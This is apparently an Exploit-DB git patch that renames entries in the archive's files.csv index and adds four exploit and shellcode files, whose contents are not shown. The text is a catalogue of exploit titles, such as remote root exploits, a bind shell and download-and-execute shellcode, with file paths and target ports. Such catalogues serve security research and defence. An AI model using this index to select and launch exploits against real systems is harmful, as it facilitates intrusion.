From 965b4bba8fcc40d894aee7fe354037507a3297c5 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 20 Jul 2016 05:02:55 +0000 Subject: [PATCH] DB: 2016-07-20 4 new exploits Microsoft Internet Explorer Object Tag Exploit (MS03-020) Microsoft Internet Explorer - Object Tag Exploit (MS03-020) ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm) ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm) Cisco IOS IPv4 Packets Denial of Service Exploit Cisco IOS - IPv4 Packets Denial of Service Exploit Cisco IOS (using hping) Remote Denial of Service Exploit Cisco IOS - (using hping) Remote Denial of Service Exploit Microsoft Windows SQL Server Denial of Service Remote Exploit (MS03-031) Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031) Microsoft Windows RPC DCOM Remote Exploit (18 Targets) Microsoft Windows RPC - DCOM Remote Exploit (18 Targets) man-db 2.4.1 open_cat_stream() Local uid=man Exploit man-db 2.4.1 - open_cat_stream() Local uid=man Exploit Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow Exploit DameWare Mini Remote Control Server SYSTEM Exploit DameWare Mini Remote Control Server - SYSTEM Exploit Microsoft Internet Explorer Object Data Remote Exploit (M03-032) Microsoft Internet Explorer - Object Data Remote Exploit (M03-032) eMule/xMule/LMule OP_SERVERMESSAGE Format String Exploit eMule/xMule/LMule - OP_SERVERMESSAGE Format String Exploit Microsoft WordPerfect Document Converter Exploit (MS03-036) Microsoft WordPerfect Document Converter - Exploit (MS03-036) Roger Wilco 1.x Client Data Buffer Overflow Exploit Roger Wilco 1.x - Client Data Buffer Overflow Exploit Solaris Sadmind Default Configuration Remote Root Exploit Solaris Sadmind - Default Configuration Remote Root Exploit Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043) Microsoft Windows Messenger Service - Denial of Service Exploit (MS03-043) Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046) Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC 
(MS03-046) Microsoft Frontpage Server Extensions fp30reg.dll Exploit (MS03-051) Microsoft Frontpage Server Extensions - fp30reg.dll Exploit (MS03-051) Microsoft Windows Workstation Service WKSSVC Remote Exploit (MS03-049) Microsoft Windows Workstation Service - WKSSVC Remote Exploit (MS03-049) Microsoft Windows XP Workstation Service Remote Exploit (MS03-049) Microsoft Windows XP Workstation Service - Remote Exploit (MS03-049) Microsoft Windows Messenger Service Remote Exploit FR (MS03-043) Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043) GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow Exploit Eudora 6.0.3 Attachment Spoofing Exploit (windows) Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit Eudora 6.0.3 - Attachment Spoofing Exploit (Windows) Foxmail 5.0 - PunyLib.dll Remote Stack Overflow Exploit eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow Exploit OpenBSD 2.6 - / 2.7ftpd Remote Exploit OpenBSD 2.6 / 2.7ftpd - Remote Exploit Redhat 6.1 - / 6.2 TTY Flood Users Exploit Redhat 6.1 / 6.2 - TTY Flood Users Exploit Solaris 2.6 - / 7 / 8 Lock Users Out of mailx Exploit Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit Solaris 2.5 - / 2.5.1 getgrnam() Local Overflow Exploit Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow Exploit Solaris 7 - / 8-beta arp Local Overflow Exploit Solaris 7 / 8-beta - arp Local Overflow Exploit Solaris 2.6 - / 2.7 /usr/bin/write Local Overflow Exploit Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Exploit Cisco Multiple Products Automated Exploit Tool Cisco Multiple Products - Automated Exploit Tool Microsoft Internet Explorer (11 bytes) Denial of Service Exploit Microsoft Internet Explorer - Denial of Service Exploit (11 bytes) PHP <= 4.3.7/ 5.0.0RC3 - memory_limit Remote Exploit PHP <= 4.3.7/5.0.0RC3 - memory_limit Remote Exploit VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) 
(updated) VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (updated) GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (2) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1st) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1) Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl) Maxwebportal <= 1.36 password.asp Change Password Exploit (2 - php) Maxwebportal <= 1.36 password.asp Change Password Exploit (1 - html) Maxwebportal <= 1.36 password.asp Change Password Exploit (3) (perl) Maxwebportal <= 1.36 password.asp Change Password Exploit (2) (php) Maxwebportal <= 1.36 password.asp Change Password Exploit (1) (html) ProRat Server <= 1.9 - (Fix-2) Buffer Overflow Crash Exploit ProRat Server <= 1.9 (Fix-2) - Buffer Overflow Crash Exploit Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated) Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2) phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated) phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (2) Microsoft Windows - ACLs Local Privilege Escalation Exploit (Updated) Microsoft Windows - ACLs Local Privilege Escalation Exploit (2) HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (updated) HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (2) phpBB Journals System Mod 1.0.2 [RC2] - Remote File Include Exploit phpBB Journals System Mod 1.0.2 RC2 - Remote File Include Exploit Mozilla Firefox <= 1.5.0.7/ 2.0 - (createRange) Remote DoS Exploit Mozilla Firefox <= 1.5.0.7/2.0 - (createRange) Remote DoS Exploit BrowseDialog Class (ccrpbds6.dll) Multiple Methods DoS Exploit BrowseDialog Class - (ccrpbds6.dll) Multiple Methods DoS Exploit Asterisk <= 1.2.15 - / 1.4.0 pre-auth Remote Denial of Service Exploit Asterisk <= 1.2.15 / 1.4.0 - pre-auth Remote Denial of 
Service Exploit PHP < 4.4.5 - / 5.2.1 php_binary Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 WDDX Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 - php_binary Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 - WDDX Session Deserialization Information Leak PHP <= 4.4.6 - / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit PHP <= 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit PHP <= 4.4.6 - / 5.2.1 ext/gd Already Freed Resources Usage Exploit PHP <= 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit Asterisk <= 1.2.16 - / 1.4.1 SIP INVITE Remote Denial of Service Exploit Asterisk <= 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service Exploit PHP < 4.4.5 - / 5.2.1 _SESSION unset() Local Exploit PHP < 4.4.5 - / 5.2.1 _SESSION Deserialization Overwrite Exploit PHP < 4.4.5 - / 5.2.1 - _SESSION unset() Local Exploit PHP < 4.4.5 - / 5.2.1 - _SESSION Deserialization Overwrite Exploit PHP 4.4.5 - / 4.4.6 session_decode() Double Free Exploit PoC PHP 4.4.5 / 4.4.6 - session_decode() Double Free Exploit PoC XOOPS Module MyAds Bug Fix <= 2.04jp (index.php) SQL Injection Exploit XOOPS Module MyAds Bug Fix <= 2.04jp - (index.php) SQL Injection Exploit Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities Kaqoo Auction - (install_root) Multiple Remote File Include Vulnerabilities Asterisk < 1.2.22 - / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities Weblogicnet - (files_dir) Multiple Remote File Inclusion Vulnerabilities PHP <= 4.4.7 - / 5.2.3 MySQL/MySQLi Safe Mode Bypass PHP <= 4.4.7 / 5.2.3 - MySQL/MySQLi Safe Mode Bypass EB Design Pty Ltd (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites EB Design Pty Ltd - (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities Lama 
Software 14.12.2007 - Multiple Remote File Inclusion Vulnerabilities sCssBoard (pwnpack) Multiple Versions Remote Exploit sCssBoard - (pwnpack) Multiple Versions Remote Exploit Data Dynamics ActiveBar (Actbar3.ocx 3.2) Multiple Insecure Methods Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities Shader TV (Beta) - Multiple Remote SQL Injection Vulnerabilities Keller Web Admin CMS 0.94 Pro Local File Inclusion Keller Web Admin CMS 0.94 Pro - Local File Inclusion Keller Web Admin CMS 0.94 Pro Local File Inclusion (1st) \o - Local File Inclusion (1st) HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit HRS Multi - (picture_pic_bv.asp key) Blind SQL Injection Exploit Kasra CMS (index.php) Multiple SQL Injection Vulnerabilities Kasra CMS - (index.php) Multiple SQL Injection Vulnerabilities Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1) Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Local Privilege Escalation Exploit (1) Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Linux Kernel <= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Mac OS X - Java applet Remote Deserialization Remote PoC (Updated) Mac OS X - Java applet Remote Deserialization Remote PoC (2) ZaoCMS (user_updated.php) Remote Change Password Exploit ZaoCMS - (user_updated.php) Remote Change Password Exploit eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulnerabilities eZoneScripts Hotornot2 Script - (Admin Bypass) Multiple Remote Vulnerabilities phpdirectorysource (XSS/SQL) Multiple Vulnerabilities phpdirectorysource - (XSS/SQL) Multiple Vulnerabilities Million-Dollar Pixel Ads Platinum (SQL/XSS) Multiple Vulnerabilities Million-Dollar 
Pixel Ads Platinum - (SQL/XSS) Multiple Vulnerabilities garagesalesjunkie (SQL/XSS) Multiple Vulnerabilities garagesalesjunkie - (SQL/XSS) Multiple Vulnerabilities Miniweb 2.0 Module Publisher (bSQL-XSS) Multiple Vulnerabilities Miniweb 2.0 Module Publisher - (bSQL/XSS) Multiple Vulnerabilities PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities PHP Script Forum Hoster - (Topic Delete/XSS) Multiple Vulnerabilities Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android) Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (Android) GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow PoC Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC) Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - 'sock_sendpage()' Local Root (PPC) phpMySite (XSS/SQLi) Multiple Vulnerabilities phpMySite - (XSS/SQLi) Multiple Vulnerabilities (Tod Miller's) Sudo/SudoEdit 1.6.x / 1.7.x (<= 1.6.9p21 / <= 1.7.2p4) - Local Root Exploit (Tod Miller's) Sudo/SudoEdit <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit Preisschlacht Multi Liveshop System SQL Injection (seite&aid) index.php Preisschlacht Multi Liveshop System - SQL Injection (seite&aid) index.php quality point 1.0 newsfeed (SQL/XSS) Multiple Vulnerabilities quality point 1.0 newsfeed - (SQL/XSS) Multiple Vulnerabilities Open Web Analytics 1.2.3 multi file include Open Web Analytics 1.2.3 - multi file include Scratcher (SQL/XSS) Multiple Remote Scratcher - (SQL/XSS) Multiple Remote phpscripte24 Live Shopping Multi Portal System SQL Injection Exploit phpscripte24 Live Shopping Multi Portal System - SQL Injection Exploit e-webtech (fixed_page.asp) SQL Injection e-webtech - (fixed_page.asp) SQL Injection parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities parlic Design - (SQL/XSS/HTML) Multiple Vulnerabilities 
MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities MileHigh Creative - (SQL/XSS/HTML Injection) Multiple Vulnerabilities CMScout (XSS/HTML Injection) Multiple Vulnerabilities CMScout - (XSS/HTML Injection) Multiple Vulnerabilities k-search (SQL/XSS) Multiple Vulnerabilities k-search - (SQL/XSS) Multiple Vulnerabilities GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities GuestBook Script PHP - (XSS/HTML Injection) Multiple Vulnerabilities Max's Guestbook (HTML Injection/XSS) Multiple Vulnerabilities Max's Guestbook - (HTML Injection/XSS) Multiple Vulnerabilities Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities Joomla Component (com_jefaqpro) - Multiple Blind SQL Injection Vulnerabilities Joomla Component (com_restaurantguide) Multiple Vulnerabilities Joomla Component - (com_restaurantguide) Multiple Vulnerabilities TradeMC E-Ticaret (SQL/XSS) Multiple Vulnerabilities TradeMC E-Ticaret - (SQL/XSS) Multiple Vulnerabilities Projekt Shop (details.php) Multiple SQL Injection Vulnerabilities Projekt Shop - (details.php) Multiple SQL Injection Vulnerabilities CakePHP <= 1.3.5 - / 1.2.8 unserialize() CakePHP <= 1.3.5 / 1.2.8 - unserialize() Rae Media Real Estate Multi Agent SQL Injection Rae Media Real Estate Multi Agent - SQL Injection Solaris ypupdated Command Execution Solaris - ypupdated Command Execution CakePHP <= 1.3.5 - / 1.2.8 Cache Corruption Exploit CakePHP <= 1.3.5 / 1.2.8 - Cache Corruption Exploit Joomla HM-Community (com_hmcommunity) Multiple Vulnerabilities Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities CyberLink Multiple Products File Project Handling Stack Buffer Overflow PoC CyberLink Multiple Products - File Project Handling Stack Buffer Overflow PoC Ruby on Rails ActionPack Inline ERB Code Execution Ruby on Rails ActionPack Inline ERB - Code 
Execution HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (1) HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (2) HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (1) HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (2) ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities ASTPP VoIP Billing (4cf207a) - Multiple Vulnerabilities Drummond Miles A1Stats 1.0 a1disp2.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 a1disp3.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 a1disp4.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp2.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp3.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp4.cgi Traversal Arbitrary File Read Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration Weakness WinSyslog Interactive Syslog Server 4.21/ long Message Remote Denial of Service WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 - Denial of Service VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service Web Wiz Multiple Products SQL Injection Web Wiz Multiple Products - SQL Injection RealNetworks 
Multiple Products Multiple Buffer Overflow Vulnerabilities RealNetworks Multiple Products - Multiple Buffer Overflow Vulnerabilities Geodesic Solutions Multiple Products index.php b Parameter SQL Injection Geodesic Solutions Multiple Products - index.php b Parameter SQL Injection HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload Linux Kernel 2.6.x (<= 2.6.17.7) - NFS and EXT3 Combination Remote Denial of Service Linux Kernel <= 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness Apache HTTP Server <= 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness Symantec Multiple Products SymEvent Driver Local Denial of Service Symantec Multiple Products - SymEvent Driver Local Denial of Service FreeBSD 5.x I386_Set_LDT() Multiple Local Denial of Service Vulnerabilities FreeBSD 5.x I386_Set_LDT() - Multiple Local Denial of Service Vulnerabilities Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit Apache + PHP < 5.3.12 & < 5.4.2 - cgi-bin Remote Code Execution Exploit Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner) Apache + PHP < 5.3.12 & < 5.4.2 - Remote Code Execution (Multithreaded Scanner) PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.php Cross-Site Scripting PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting Symantec Multiple Products SPBBCDrv Driver Local Denial of Service Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter XSS Exponent 
CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter XSS Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing Simple OS CMS 0.1c_beta 'login.php' SQL Injection Simple OS CMS 0.1c_beta - 'login.php' SQL Injection WebcamXP 3.72.440/4.05.280 beta /pocketpc camnum Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 beta /show_gallery_pic id Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 beta - /pocketpc camnum Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure Adobe Flash Player 8/ 9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution IBM Maximo 4.1/ 5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow Symantec Multiple Products - Client Proxy ActiveX (CLIproxy.dll) Remote Overflow Blog Ink (Blink) Multiple SQL Injection Vulnerabilities Blog Ink (Blink) - Multiple SQL Injection Vulnerabilities PHP Scripts Now Multiple Products bios.php rank Parameter XSS PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection PHP Scripts Now Multiple Products - bios.php rank Parameter XSS PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection cformsII 11.5/ 13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities cformsII 11.5/13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities Native Instruments Multiple Products DLL Loading Arbitrary Code Execution Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution PHP 5.x (< 5.6.2) - Bypass disable_functions Exploit (Shellshock) PHP < 5.6.2 - Bypass 
disable_functions Exploit (Shellshock) PHP 5.x (< 5.3.6) 'Zip' Extension - 'zip_fread()' Function Denial of Service PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS ManageEngine Multiple Products Authenticated File Upload ManageEngine Multiple Products - Authenticated File Upload BlueSoft Multiple Products Multiple SQL Injection Vulnerabilities BlueSoft Multiple Products - Multiple SQL Injection Vulnerabilities Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities Ay Computer Multiple Products - Multiple SQL Injection Vulnerabilities net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities net4visions Multiple Products - 'dir' parameters Multiple Cross Site Scripting Vulnerabilities Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Privilege Escalation (Access /etc/shadow) Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow) Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities Webify Multiple Products - Multiple HTML Injection and Local File Include Vulnerabilities AirLive Multiple Products OS Command Injection AirLive Multiple Products - OS Command Injection Sciretech Multiple Products Multiple SQL Injection Vulnerabilities Sciretech Multiple Products - Multiple SQL Injection Vulnerabilities AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities Windows x86 - 
URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode (394 bytes) Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes) Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes) Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit NewsP Free News Script 1.4.7 - User Credentials Disclosure newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure
---
 files.csv | 328 ++--
 platforms/lin_x86-64/shellcode/40122.txt | 161 ++
 platforms/multiple/remote/40125.py | 1730 ++++++++++++++++++++++
 platforms/php/webapps/40126.txt | 13 +
 platforms/php/webapps/40127.txt | 16 +
 5 files changed, 2086 insertions(+), 162 deletions(-)
 create mode 100755 platforms/lin_x86-64/shellcode/40122.txt
 create mode 100755 platforms/multiple/remote/40125.py
 create mode 100755 platforms/php/webapps/40126.txt
 create mode 100755 platforms/php/webapps/40127.txt
diff --git a/files.csv b/files.csv
index 9045798d3..ffc3ee371 100755
--- a/files.csv
+++ b/files.csv
@@ -35,7 +35,7 @@ id,file,description,date,author,platform,type,port
 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80
 35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 < 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0
 36,platforms/windows/remote/36.c,"Microsoft Windows WebDAV - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80
-37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
+37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
 38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80
 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69
 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,anonymous,linux,local,0
@@ -50,55 +50,55 @@ id,file,description,date,author,platform,type,port
 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25
 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80
 51,platforms/windows/remote/51.c,"Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
-52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0
+52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0
 53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit",2003-07-10,knight420,cgi,webapps,0
 54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21
 55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Bruteforce Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139
 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - (nsiislog.dll) Remote Exploit",2003-07-14,anonymous,windows,remote,80
 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0
 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504
-59,platforms/hardware/dos/59.c,"Cisco IOS IPv4 Packets Denial of Service Exploit",2003-07-18,l0cK,hardware,dos,0
+59,platforms/hardware/dos/59.c,"Cisco IOS - IPv4 Packets Denial of Service Exploit",2003-07-18,l0cK,hardware,dos,0
 60,platforms/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service Exploit",2003-07-21,"Martin Kluge",hardware,dos,0
 61,platforms/windows/dos/61.c,"Microsoft Windows 2000 - RPC DCOM Interface DoS Exploit",2003-07-21,Flashsky,windows,dos,0
-62,platforms/hardware/dos/62.sh,"Cisco IOS (using hping) Remote Denial of Service Exploit",2003-07-22,zerash,hardware,dos,0
+62,platforms/hardware/dos/62.sh,"Cisco IOS - (using hping) Remote Denial of Service Exploit",2003-07-22,zerash,hardware,dos,0
 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - Remote GID Root Exploit",2003-07-25,"the itch",linux,remote,1114
 64,platforms/windows/remote/64.c,"Microsoft Windows - (RPC DCOM) Remote Buffer Overflow Exploit",2003-07-25,Flashsky,windows,remote,135
-65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0
+65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0
 66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution Exploit",2003-07-28,"Carl Livitt",multiple,remote,80
 68,platforms/linux/dos/68.c,"Linux Kernel <= 2.4.20 - decode_fh Denial of Service Exploit",2003-07-29,"Jared Stanbrough",linux,dos,0
-69,platforms/windows/remote/69.c,"Microsoft Windows RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135
+69,platforms/windows/remote/69.c,"Microsoft Windows RPC - DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135
 70,platforms/windows/remote/70.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (48 Targets)",2003-07-30,anonymous,windows,remote,135
 71,platforms/linux/local/71.c,"XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0
